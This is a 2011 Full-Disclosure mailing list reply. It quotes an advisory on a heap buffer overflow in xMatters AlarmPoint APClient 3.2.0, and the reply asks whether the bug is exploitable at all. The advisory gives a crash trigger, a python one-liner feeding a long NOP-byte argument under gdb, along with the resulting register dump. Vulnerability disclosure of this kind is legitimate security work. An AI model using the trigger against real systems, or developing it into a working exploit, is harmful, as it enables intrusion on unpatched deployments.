Re: Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

[Mario Vilas <mvilas () gmail com>]

Is the suid bit set on that binary? Otherwise, unless I'm missing something
it doesn't seem to be exploitable by an attacker...

On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco
<jsacco () insecurityresearch com>wrote:

>  Information
>  --------------------
>  Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
>  Version: APClient 3.2.0 (native)
>  Software : xMatters AlarmPoint
>  Vendor Homepage : http://www.xmatters.com
>  Vulnerability Type : Heap Buffer Overflow
>  Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
>  Severity : High
>  Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
>  Description
>  ------------------
>  The AlarmPoint Java Server consists of a collection of software
>  components and software APIs designed to provide a flexible and
>  powerful set of tools for integrating various applications to
>  AlarmPoint.
>
>  Details
>  -------------------
>  AlarmPoint APClient is affected by a Heap Overflow vulnerability in
>  version APClient 3.2.0 (native)
>
>  A heap overflow condition is a buffer overflow, where the buffer that
>  can be overwritten is allocated in the heap portion of memory, generally
>  meaning that the buffer was allocated using a routine such as the POSIX
>  malloc() call.
>  https://www.owasp.org/index.php/Heap_overflow
>
>
>  Exploit as follow:
>  Submit a malicious file cointaining the exploit
>  root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$
>  ./APClient.bin --submit-file maliciousfile.hex
>  or
>  (gdb) run `python -c 'print "\x90"*16287'`
>  Starting program:
>  /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
>  'print "\x90"*16287'`
>
>  Program received signal SIGSEGV, Segmentation fault.
>  0x0804be8a in free ()
>  (gdb) i r
>  eax            0xa303924        170932516
>  ecx            0xbfb8   49080
>  edx            0xa303924        170932516
>  ebx            0x8059438        134583352
>  esp            0xbfff3620       0xbfff3620
>  ebp            0xbfff3638       0xbfff3638
>  esi            0x8059440        134583360
>  edi            0x80653f0        134632432
>  eip            0x804be8a        0x804be8a <free+126>
>  eflags         0x210206 [ PF IF RF ID ]
>  cs             0x73     115
>  ss             0x7b     123
>  ds             0x7b     123
>  es             0x7b     123
>  fs             0x0      0
>  gs             0x33     51
>  (gdb)
>
>
>  Solution
>  -------------------
>  No patch are available at this time.
>
>  Credits
>  -------------------
>  Manual discovered by Insecurity Research Labs
>  Juan Sacco - http://www.insecurityresearch.com
>
> --
>  --
>  _________________________________________________
>  Insecurity Research - Security auditing and testing software
>  Web: http://www.insecurityresearch.com
>  Insect Pro 2.5 was released stay tunned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/